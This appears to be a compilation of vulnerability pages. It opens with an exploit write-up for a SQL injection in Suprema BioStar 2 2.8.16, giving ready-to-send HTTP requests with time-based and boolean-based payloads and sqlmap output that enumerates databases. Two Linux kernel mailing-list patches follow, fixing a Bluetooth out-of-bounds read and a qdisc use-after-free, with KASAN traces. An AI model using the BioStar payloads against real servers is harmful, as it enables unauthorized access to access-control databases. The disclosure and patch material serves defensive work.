Suprema BioStar 2 version 2.8.16 suffers from a remote SQL injection vulnerability.

    # Exploit Title: CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection# Date: 26/03/2023# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)# Vendor Homepage: https://www.supremainc.com/# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide# Version: 2.8.16# Tested on: Windows, Linux## Description A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter. ## Request PoC #1'''POST /api/users/absence?search_month=1 HTTP/1.1Host: biostar2.server.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: application/json, text/plain, */*Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflatecontent-type: application/json;charset=UTF-8content-language: enbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548Content-Length: 204Origin: https://biostar2.server.netConnection: closeReferer: https://biostar2.server.net/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}'''Time based SQL injection (set 4 – response delays for 8 seconds).'''## Request PoC #2'''POST /api/users/absence?search_month=1 HTTP/1.1Host: biostar2.server.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: application/json, text/plain, */*Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflatecontent-type: application/json;charset=UTF-8content-language: enbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548Content-Length: 188Origin: https://biostar2.server.netConnection: closeReferer: https://biostar2.server.net/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}'''Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)'''## Exploit with SQLmapSave the request from Burp Suite to file.'''---Parameter: JSON #1* ((custom) POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}---[05:02:49] [INFO] testing MySQL[05:02:49] [INFO] confirming MySQL[05:02:50] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL > 5.0.0 (MariaDB fork)[05:02:50] [INFO] fetching database names[05:02:50] [INFO] fetching number of databases[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[05:02:55] [INFO] retrieved: 2[05:03:12] [INFO] retrieved: biostar2_ac[05:03:56] [INFO] retrieved: information_schemaavailable databases [2]:[*] biostar2_ac[*] information schema'''

Suprema BioStar 2 2.8.16 SQL Injection

In the Linux kernel through 6.2.8, net/bluetooth/hci_sync.c allows out-of-bounds access because amp_init1[] and amp_init2[] are supposed to have an intentionally invalid element, but do not.

From: Sungwoo Kim <iam@sung-woo.kim>
To: unlisted-recipients:; (no To-header on input)
Cc: wuruoyu@me.com, benquike@gmail.com, daveti@purdue.edu,
	Sungwoo Kim <iam@sung-woo.kim>,
	Marcel Holtmann <marcel@holtmann.org>,
	Johan Hedberg <johan.hedberg@gmail.com>,
	Luiz Augusto von Dentz <luiz.dentz@gmail.com>,
	"David S. Miller" <davem@davemloft.net>,
	Eric Dumazet <edumazet@google.com>,
	Jakub Kicinski <kuba@kernel.org>, Paolo Abeni <pabeni@redhat.com>,
	linux-bluetooth@vger.kernel.org, netdev@vger.kernel.org,
	linux-kernel@vger.kernel.org
Subject: \[PATCH\] Bluetooth: HCI: Fix global-out-of-bounds
Date: Mon, 20 Mar 2023 21:50:18 -0400	\[thread overview\]
Message-ID: <20230321015018.1759683-1-iam@sung-woo.kim> (raw)

To loop a variable-length array, hci\_init\_stage\_sync(stage) considers
that stage\[i\] is valid as long as stage\[i-1\].func is valid.
Thus, the last element of stage\[\].func should be intentionally invalid
as hci\_init0\[\], le\_init2\[\], and others did.
However, amp\_init1\[\] and amp\_init2\[\] have no invalid element, letting
hci\_init\_stage\_sync() keep accessing amp\_init1\[\] over its valid range.
This patch fixes this by adding {} in the last of amp\_init1\[\] and
amp\_init2\[\].

==================================================================
BUG: KASAN: global-out-of-bounds in hci\_dev\_open\_sync (/v6.2-bzimage/net/bluetooth/hci\_sync.c:3154 /v6.2-bzimage/net/bluetooth/hci\_sync.c:3343 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4418 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4609 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4689)
Read of size 8 at addr ffffffffaed1ab70 by task kworker/u5:0/1032
CPU: 0 PID: 1032 Comm: kworker/u5:0 Not tainted 6.2.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04
Workqueue: hci1 hci\_power\_on
Call Trace:
 <TASK>
dump\_stack\_lvl (/v6.2-bzimage/lib/dump\_stack.c:107 (discriminator 1))
print\_report (/v6.2-bzimage/mm/kasan/report.c:307 /v6.2-bzimage/mm/kasan/report.c:417)
? hci\_dev\_open\_sync (/v6.2-bzimage/net/bluetooth/hci\_sync.c:3154 /v6.2-bzimage/net/bluetooth/hci\_sync.c:3343 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4418 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4609 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4689)
kasan\_report (/v6.2-bzimage/mm/kasan/report.c:184 /v6.2-bzimage/mm/kasan/report.c:519)
? hci\_dev\_open\_sync (/v6.2-bzimage/net/bluetooth/hci\_sync.c:3154 /v6.2-bzimage/net/bluetooth/hci\_sync.c:3343 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4418 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4609 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4689)
hci\_dev\_open\_sync (/v6.2-bzimage/net/bluetooth/hci\_sync.c:3154 /v6.2-bzimage/net/bluetooth/hci\_sync.c:3343 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4418 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4609 /v6.2-bzimage/net/bluetooth/hci\_sync.c:4689)
? \_\_pfx\_hci\_dev\_open\_sync (/v6.2-bzimage/net/bluetooth/hci\_sync.c:4635)
? mutex\_lock (/v6.2-bzimage/./arch/x86/include/asm/atomic64\_64.h:190 /v6.2-bzimage/./include/linux/atomic/atomic-long.h:443 /v6.2-bzimage/./include/linux/atomic/atomic-instrumented.h:1781 /v6.2-bzimage/kernel/locking/mutex.c:171 /v6.2-bzimage/kernel/locking/mutex.c:285)
? \_\_pfx\_mutex\_lock (/v6.2-bzimage/kernel/locking/mutex.c:282)
hci\_power\_on (/v6.2-bzimage/net/bluetooth/hci\_core.c:485 /v6.2-bzimage/net/bluetooth/hci\_core.c:984)
? \_\_pfx\_hci\_power\_on (/v6.2-bzimage/net/bluetooth/hci\_core.c:969)
? read\_word\_at\_a\_time (/v6.2-bzimage/./include/asm-generic/rwonce.h:85)
? strscpy (/v6.2-bzimage/./arch/x86/include/asm/word-at-a-time.h:62 /v6.2-bzimage/lib/string.c:161)
process\_one\_work (/v6.2-bzimage/kernel/workqueue.c:2294)
worker\_thread (/v6.2-bzimage/./include/linux/list.h:292 /v6.2-bzimage/kernel/workqueue.c:2437)
? \_\_pfx\_worker\_thread (/v6.2-bzimage/kernel/workqueue.c:2379)
kthread (/v6.2-bzimage/kernel/kthread.c:376)
? \_\_pfx\_kthread (/v6.2-bzimage/kernel/kthread.c:331)
ret\_from\_fork (/v6.2-bzimage/arch/x86/entry/entry\_64.S:314)
 </TASK>
The buggy address belongs to the variable:
amp\_init1+0x30/0x60
The buggy address belongs to the physical page:
page:000000003a157ec6 refcount:1 mapcount:0 mapping:0000000000000000 ia
flags: 0x200000000001000(reserved|node=0|zone=2)
raw: 0200000000001000 ffffea0005054688 ffffea0005054688 000000000000000
raw: 0000000000000000 0000000000000000 00000001ffffffff 000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
 ffffffffaed1aa00: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
 ffffffffaed1aa80: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
\>ffffffffaed1ab00: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 f9 f9
                                                             ^
 ffffffffaed1ab80: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 f9
 ffffffffaed1ac00: f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9 00 00 02 f9

This bug is found by FuzzBT, a modified version of Syzkaller.
Other contributors for this bug are Ruoyu Wu and Peng Hui.

Fixes: d0b137062b2d ("Bluetooth: hci\_sync: Rework init stages")
Signed-off-by: Sungwoo Kim <iam@sung-woo.kim>
---
 net/bluetooth/hci\_sync.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/net/bluetooth/hci\_sync.c b/net/bluetooth/hci\_sync.c
index 117eedb6f..49e692d73 100644
--- a/net/bluetooth/hci\_sync.c
+++ b/net/bluetooth/hci\_sync.c
@@ -3319,6 +3319,7 @@ static const struct hci\_init\_stage amp\_init1\[\] = {
 	HCI\_INIT(hci\_read\_flow\_control\_mode\_sync),
 	/\* HCI\_OP\_READ\_LOCATION\_DATA \*/
 	HCI\_INIT(hci\_read\_location\_data\_sync),
+	{}
 };
 
 static int hci\_init1\_sync(struct hci\_dev \*hdev)
@@ -3353,6 +3354,7 @@ static int hci\_init1\_sync(struct hci\_dev \*hdev)
 static const struct hci\_init\_stage amp\_init2\[\] = {
 	/\* HCI\_OP\_READ\_LOCAL\_FEATURES \*/
 	HCI\_INIT(hci\_read\_local\_features\_sync),
+	{}
 };
 
 /\* Read Buffer Size (ACL mtu, max pkt, etc.) \*/
-- 
2.34.1

next             reply	other threads:\[~2023-03-21  1:50 UTC|newest\]

**Thread overview:** 3+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
**2023-03-21  1:50 Sungwoo Kim \[this message\]**
2023-03-21 11:51 \` \[PATCH\] Bluetooth: HCI: Fix global-out-of-bounds Simon Horman
2023-03-22 23:00 \` patchwork-bot+bluetooth

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20230321015018.1759683-1-iam@sung-woo.kim \\
    --to=iam@sung-woo.kim \\
    --cc=benquike@gmail.com \\
    --cc=davem@davemloft.net \\
    --cc=daveti@purdue.edu \\
    --cc=edumazet@google.com \\
    --cc=johan.hedberg@gmail.com \\
    --cc=kuba@kernel.org \\
    --cc=linux-bluetooth@vger.kernel.org \\
    --cc=linux-kernel@vger.kernel.org \\
    --cc=luiz.dentz@gmail.com \\
    --cc=marcel@holtmann.org \\
    --cc=netdev@vger.kernel.org \\
    --cc=pabeni@redhat.com \\
    --cc=wuruoyu@me.com \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

CVE-2023-28866: [PATCH] Bluetooth: HCI: Fix global-out-of-bounds

A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue. If patch ebda44da44f6 ("net: sched: fix race condition in qdisc_graft()") not applied yet, then kernel could be affected.

From: Eric Dumazet <edumazet@google.com>
To: "David S . Miller" <davem@davemloft.net>,
	Jakub Kicinski <kuba@kernel.org>, Paolo Abeni <pabeni@redhat.com>
Cc: netdev@vger.kernel.org, Cong Wang <xiyou.wangcong@gmail.com>,
	eric.dumazet@gmail.com, Eric Dumazet <edumazet@google.com>,
	syzbot <syzkaller@googlegroups.com>,
	Dmitry Vyukov <dvyukov@google.com>
Subject: \[PATCH net\] net: sched: fix race condition in qdisc\_graft()
Date: Tue, 18 Oct 2022 20:32:58 +0000	\[thread overview\]
Message-ID: <20221018203258.2793282-1-edumazet@google.com> (raw)

We had one syzbot report \[1\] in syzbot queue for a while.
I was waiting for more occurrences and/or a repro but
Dmitry Vyukov spotted the issue right away.

<quoting Dmitry>
qdisc\_graft() drops reference to qdisc in notify\_and\_destroy
while it's still assigned to dev->qdisc
</quoting>

Indeed, RCU rules are clear when replacing a data structure.
The visible pointer (dev->qdisc in this case) must be updated
to the new object \_before\_ RCU grace period is started
(qdisc\_put(old) in this case).

\[1\]
BUG: KASAN: use-after-free in \_\_tcf\_qdisc\_find.part.0+0xa3a/0xac0 net/sched/cls\_api.c:1066
Read of size 4 at addr ffff88802065e038 by task syz-executor.4/21027

CPU: 0 PID: 21027 Comm: syz-executor.4 Not tainted 6.0.0-rc3-syzkaller-00363-g7726d4c3e60b #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/26/2022
Call Trace:
<TASK>
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
dump\_stack\_lvl+0xcd/0x134 lib/dump\_stack.c:106
print\_address\_description mm/kasan/report.c:317 \[inline\]
print\_report.cold+0x2ba/0x719 mm/kasan/report.c:433
kasan\_report+0xb1/0x1e0 mm/kasan/report.c:495
\_\_tcf\_qdisc\_find.part.0+0xa3a/0xac0 net/sched/cls\_api.c:1066
\_\_tcf\_qdisc\_find net/sched/cls\_api.c:1051 \[inline\]
tc\_new\_tfilter+0x34f/0x2200 net/sched/cls\_api.c:2018
rtnetlink\_rcv\_msg+0x955/0xca0 net/core/rtnetlink.c:6081
netlink\_rcv\_skb+0x153/0x420 net/netlink/af\_netlink.c:2501
netlink\_unicast\_kernel net/netlink/af\_netlink.c:1319 \[inline\]
netlink\_unicast+0x543/0x7f0 net/netlink/af\_netlink.c:1345
netlink\_sendmsg+0x917/0xe10 net/netlink/af\_netlink.c:1921
sock\_sendmsg\_nosec net/socket.c:714 \[inline\]
sock\_sendmsg+0xcf/0x120 net/socket.c:734
\_\_\_\_sys\_sendmsg+0x6eb/0x810 net/socket.c:2482
\_\_\_sys\_sendmsg+0x110/0x1b0 net/socket.c:2536
\_\_sys\_sendmsg+0xf3/0x1c0 net/socket.c:2565
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x7f5efaa89279
Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f5efbc31168 EFLAGS: 00000246 ORIG\_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 00007f5efab9bf80 RCX: 00007f5efaa89279
RDX: 0000000000000000 RSI: 0000000020000140 RDI: 0000000000000005
RBP: 00007f5efaae32e9 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f5efb0cfb1f R14: 00007f5efbc31300 R15: 0000000000022000
</TASK>

Allocated by task 21027:
kasan\_save\_stack+0x1e/0x40 mm/kasan/common.c:38
kasan\_set\_track mm/kasan/common.c:45 \[inline\]
set\_alloc\_info mm/kasan/common.c:437 \[inline\]
\_\_\_\_kasan\_kmalloc mm/kasan/common.c:516 \[inline\]
\_\_\_\_kasan\_kmalloc mm/kasan/common.c:475 \[inline\]
\_\_kasan\_kmalloc+0xa9/0xd0 mm/kasan/common.c:525
kmalloc\_node include/linux/slab.h:623 \[inline\]
kzalloc\_node include/linux/slab.h:744 \[inline\]
qdisc\_alloc+0xb0/0xc50 net/sched/sch\_generic.c:938
qdisc\_create\_dflt+0x71/0x4a0 net/sched/sch\_generic.c:997
attach\_one\_default\_qdisc net/sched/sch\_generic.c:1152 \[inline\]
netdev\_for\_each\_tx\_queue include/linux/netdevice.h:2437 \[inline\]
attach\_default\_qdiscs net/sched/sch\_generic.c:1170 \[inline\]
dev\_activate+0x760/0xcd0 net/sched/sch\_generic.c:1229
\_\_dev\_open+0x393/0x4d0 net/core/dev.c:1441
\_\_dev\_change\_flags+0x583/0x750 net/core/dev.c:8556
rtnl\_configure\_link+0xee/0x240 net/core/rtnetlink.c:3189
rtnl\_newlink\_create net/core/rtnetlink.c:3371 \[inline\]
\_\_rtnl\_newlink+0x10b8/0x17e0 net/core/rtnetlink.c:3580
rtnl\_newlink+0x64/0xa0 net/core/rtnetlink.c:3593
rtnetlink\_rcv\_msg+0x43a/0xca0 net/core/rtnetlink.c:6090
netlink\_rcv\_skb+0x153/0x420 net/netlink/af\_netlink.c:2501
netlink\_unicast\_kernel net/netlink/af\_netlink.c:1319 \[inline\]
netlink\_unicast+0x543/0x7f0 net/netlink/af\_netlink.c:1345
netlink\_sendmsg+0x917/0xe10 net/netlink/af\_netlink.c:1921
sock\_sendmsg\_nosec net/socket.c:714 \[inline\]
sock\_sendmsg+0xcf/0x120 net/socket.c:734
\_\_\_\_sys\_sendmsg+0x6eb/0x810 net/socket.c:2482
\_\_\_sys\_sendmsg+0x110/0x1b0 net/socket.c:2536
\_\_sys\_sendmsg+0xf3/0x1c0 net/socket.c:2565
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Freed by task 21020:
kasan\_save\_stack+0x1e/0x40 mm/kasan/common.c:38
kasan\_set\_track+0x21/0x30 mm/kasan/common.c:45
kasan\_set\_free\_info+0x20/0x30 mm/kasan/generic.c:370
\_\_\_\_kasan\_slab\_free mm/kasan/common.c:367 \[inline\]
\_\_\_\_kasan\_slab\_free+0x166/0x1c0 mm/kasan/common.c:329
kasan\_slab\_free include/linux/kasan.h:200 \[inline\]
slab\_free\_hook mm/slub.c:1754 \[inline\]
slab\_free\_freelist\_hook+0x8b/0x1c0 mm/slub.c:1780
slab\_free mm/slub.c:3534 \[inline\]
kfree+0xe2/0x580 mm/slub.c:4562
rcu\_do\_batch kernel/rcu/tree.c:2245 \[inline\]
rcu\_core+0x7b5/0x1890 kernel/rcu/tree.c:2505
\_\_do\_softirq+0x1d3/0x9c6 kernel/softirq.c:571

Last potentially related work creation:
kasan\_save\_stack+0x1e/0x40 mm/kasan/common.c:38
\_\_kasan\_record\_aux\_stack+0xbe/0xd0 mm/kasan/generic.c:348
call\_rcu+0x99/0x790 kernel/rcu/tree.c:2793
qdisc\_put+0xcd/0xe0 net/sched/sch\_generic.c:1083
notify\_and\_destroy net/sched/sch\_api.c:1012 \[inline\]
qdisc\_graft+0xeb1/0x1270 net/sched/sch\_api.c:1084
tc\_modify\_qdisc+0xbb7/0x1a00 net/sched/sch\_api.c:1671
rtnetlink\_rcv\_msg+0x43a/0xca0 net/core/rtnetlink.c:6090
netlink\_rcv\_skb+0x153/0x420 net/netlink/af\_netlink.c:2501
netlink\_unicast\_kernel net/netlink/af\_netlink.c:1319 \[inline\]
netlink\_unicast+0x543/0x7f0 net/netlink/af\_netlink.c:1345
netlink\_sendmsg+0x917/0xe10 net/netlink/af\_netlink.c:1921
sock\_sendmsg\_nosec net/socket.c:714 \[inline\]
sock\_sendmsg+0xcf/0x120 net/socket.c:734
\_\_\_\_sys\_sendmsg+0x6eb/0x810 net/socket.c:2482
\_\_\_sys\_sendmsg+0x110/0x1b0 net/socket.c:2536
\_\_sys\_sendmsg+0xf3/0x1c0 net/socket.c:2565
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Second to last potentially related work creation:
kasan\_save\_stack+0x1e/0x40 mm/kasan/common.c:38
\_\_kasan\_record\_aux\_stack+0xbe/0xd0 mm/kasan/generic.c:348
kvfree\_call\_rcu+0x74/0x940 kernel/rcu/tree.c:3322
neigh\_destroy+0x431/0x630 net/core/neighbour.c:912
neigh\_release include/net/neighbour.h:454 \[inline\]
neigh\_cleanup\_and\_release+0x1f8/0x330 net/core/neighbour.c:103
neigh\_del net/core/neighbour.c:225 \[inline\]
neigh\_remove\_one+0x37d/0x460 net/core/neighbour.c:246
neigh\_forced\_gc net/core/neighbour.c:276 \[inline\]
neigh\_alloc net/core/neighbour.c:447 \[inline\]
\_\_\_neigh\_create+0x18b5/0x29a0 net/core/neighbour.c:642
ip6\_finish\_output2+0xfb8/0x1520 net/ipv6/ip6\_output.c:125
\_\_ip6\_finish\_output net/ipv6/ip6\_output.c:195 \[inline\]
ip6\_finish\_output+0x690/0x1160 net/ipv6/ip6\_output.c:206
NF\_HOOK\_COND include/linux/netfilter.h:296 \[inline\]
ip6\_output+0x1ed/0x540 net/ipv6/ip6\_output.c:227
dst\_output include/net/dst.h:451 \[inline\]
NF\_HOOK include/linux/netfilter.h:307 \[inline\]
NF\_HOOK include/linux/netfilter.h:301 \[inline\]
mld\_sendpack+0xa09/0xe70 net/ipv6/mcast.c:1820
mld\_send\_cr net/ipv6/mcast.c:2121 \[inline\]
mld\_ifc\_work+0x71c/0xdc0 net/ipv6/mcast.c:2653
process\_one\_work+0x991/0x1610 kernel/workqueue.c:2289
worker\_thread+0x665/0x1080 kernel/workqueue.c:2436
kthread+0x2e4/0x3a0 kernel/kthread.c:376
ret\_from\_fork+0x1f/0x30 arch/x86/entry/entry\_64.S:306

The buggy address belongs to the object at ffff88802065e000
which belongs to the cache kmalloc-1k of size 1024
The buggy address is located 56 bytes inside of
1024-byte region \[ffff88802065e000, ffff88802065e400)

The buggy address belongs to the physical page:
page:ffffea0000819600 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x20658
head:ffffea0000819600 order:3 compound\_mapcount:0 compound\_pincount:0
flags: 0xfff00000010200(slab|head|node=0|zone=1|lastcpupid=0x7ff)
raw: 00fff00000010200 0000000000000000 dead000000000001 ffff888011841dc0
raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
page\_owner tracks the page as allocated
page last allocated via order 3, migratetype Unmovable, gfp\_mask 0xd20c0(\_\_GFP\_IO|\_\_GFP\_FS|\_\_GFP\_NOWARN|\_\_GFP\_NORETRY|\_\_GFP\_COMP|\_\_GFP\_NOMEMALLOC), pid 3523, tgid 3523 (sshd), ts 41495190986, free\_ts 41417713212
prep\_new\_page mm/page\_alloc.c:2532 \[inline\]
get\_page\_from\_freelist+0x109b/0x2ce0 mm/page\_alloc.c:4283
\_\_alloc\_pages+0x1c7/0x510 mm/page\_alloc.c:5515
alloc\_pages+0x1a6/0x270 mm/mempolicy.c:2270
alloc\_slab\_page mm/slub.c:1824 \[inline\]
allocate\_slab+0x27e/0x3d0 mm/slub.c:1969
new\_slab mm/slub.c:2029 \[inline\]
\_\_\_slab\_alloc+0x7f1/0xe10 mm/slub.c:3031
\_\_slab\_alloc.constprop.0+0x4d/0xa0 mm/slub.c:3118
slab\_alloc\_node mm/slub.c:3209 \[inline\]
\_\_kmalloc\_node\_track\_caller+0x2f2/0x380 mm/slub.c:4955
kmalloc\_reserve net/core/skbuff.c:358 \[inline\]
\_\_alloc\_skb+0xd9/0x2f0 net/core/skbuff.c:430
alloc\_skb\_fclone include/linux/skbuff.h:1307 \[inline\]
tcp\_stream\_alloc\_skb+0x38/0x580 net/ipv4/tcp.c:861
tcp\_sendmsg\_locked+0xc36/0x2f80 net/ipv4/tcp.c:1325
tcp\_sendmsg+0x2b/0x40 net/ipv4/tcp.c:1483
inet\_sendmsg+0x99/0xe0 net/ipv4/af\_inet.c:819
sock\_sendmsg\_nosec net/socket.c:714 \[inline\]
sock\_sendmsg+0xcf/0x120 net/socket.c:734
sock\_write\_iter+0x291/0x3d0 net/socket.c:1108
call\_write\_iter include/linux/fs.h:2187 \[inline\]
new\_sync\_write fs/read\_write.c:491 \[inline\]
vfs\_write+0x9e9/0xdd0 fs/read\_write.c:578
ksys\_write+0x1e8/0x250 fs/read\_write.c:631
page last free stack trace:
reset\_page\_owner include/linux/page\_owner.h:24 \[inline\]
free\_pages\_prepare mm/page\_alloc.c:1449 \[inline\]
free\_pcp\_prepare+0x5e4/0xd20 mm/page\_alloc.c:1499
free\_unref\_page\_prepare mm/page\_alloc.c:3380 \[inline\]
free\_unref\_page+0x19/0x4d0 mm/page\_alloc.c:3476
\_\_unfreeze\_partials+0x17c/0x1a0 mm/slub.c:2548
qlink\_free mm/kasan/quarantine.c:168 \[inline\]
qlist\_free\_all+0x6a/0x170 mm/kasan/quarantine.c:187
kasan\_quarantine\_reduce+0x180/0x200 mm/kasan/quarantine.c:294
\_\_kasan\_slab\_alloc+0xa2/0xc0 mm/kasan/common.c:447
kasan\_slab\_alloc include/linux/kasan.h:224 \[inline\]
slab\_post\_alloc\_hook mm/slab.h:727 \[inline\]
slab\_alloc\_node mm/slub.c:3243 \[inline\]
slab\_alloc mm/slub.c:3251 \[inline\]
\_\_kmem\_cache\_alloc\_lru mm/slub.c:3258 \[inline\]
kmem\_cache\_alloc+0x267/0x3b0 mm/slub.c:3268
kmem\_cache\_zalloc include/linux/slab.h:723 \[inline\]
alloc\_buffer\_head+0x20/0x140 fs/buffer.c:2974
alloc\_page\_buffers+0x280/0x790 fs/buffer.c:829
create\_empty\_buffers+0x2c/0xee0 fs/buffer.c:1558
ext4\_block\_write\_begin+0x1004/0x1530 fs/ext4/inode.c:1074
ext4\_da\_write\_begin+0x422/0xae0 fs/ext4/inode.c:2996
generic\_perform\_write+0x246/0x560 mm/filemap.c:3738
ext4\_buffered\_write\_iter+0x15b/0x460 fs/ext4/file.c:270
ext4\_file\_write\_iter+0x44a/0x1660 fs/ext4/file.c:679
call\_write\_iter include/linux/fs.h:2187 \[inline\]
new\_sync\_write fs/read\_write.c:491 \[inline\]
vfs\_write+0x9e9/0xdd0 fs/read\_write.c:578

Fixes: af356afa010f ("net\_sched: reintroduce dev->qdisc for use by sch\_api")
Reported-by: syzbot <syzkaller@googlegroups.com>
Diagnosed-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
---
 net/sched/sch\_api.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/net/sched/sch\_api.c b/net/sched/sch\_api.c
index c98af0ada706efee202a20a6bfb6f2b984106f45..4a27dfb1ba0faab3692a82969fb8b78768742779 100644
--- a/net/sched/sch\_api.c
+++ b/net/sched/sch\_api.c
@@ -1099,12 +1099,13 @@ static int qdisc\_graft(struct net\_device \*dev, struct Qdisc \*parent,
 
 skip:
 		if (!ingress) {
\-			notify\_and\_destroy(net, skb, n, classid,
-					   rtnl\_dereference(dev->qdisc), new);
+			old = rtnl\_dereference(dev->qdisc);
 			if (new && !new->ops->attach)
 				qdisc\_refcount\_inc(new);
 			rcu\_assign\_pointer(dev->qdisc, new ? : &noop\_qdisc);
 
+			notify\_and\_destroy(net, skb, n, classid, old, new);
+
 			if (new && new->ops->attach)
 				new->ops->attach(new);
 		} else {
-- 
2.38.0.135.g90850a2211-goog

next             reply	other threads:\[~2022-10-18 20:33 UTC|newest\]

**Thread overview:** 16+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
**2022-10-18 20:32 Eric Dumazet \[this message\]**
2022-10-20  0:50 \` \[PATCH net\] net: sched: fix race condition in qdisc\_graft() patchwork-bot+netdevbpf
2022-11-03 13:34 \` Gal Pressman
2022-11-03 15:17   \` Eric Dumazet
2022-11-03 15:27     \` Jakub Kicinski
2022-11-03 15:29       \` Eric Dumazet
2022-11-03 16:30         \` Maxim Mikityanskiy
2022-11-03 16:33           \` Eric Dumazet
2022-11-06  8:07             \` Gal Pressman
2022-11-10  9:08               \` Gal Pressman
2022-11-20  7:42                 \` Gal Pressman
2022-11-20 16:09                   \` Eric Dumazet
2022-11-20 16:43                     \` Gal Pressman
2022-11-20 17:00                       \` Eric Dumazet
2022-11-20 21:39                         \` Максим
2022-11-21  8:08                           \` Gal Pressman

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
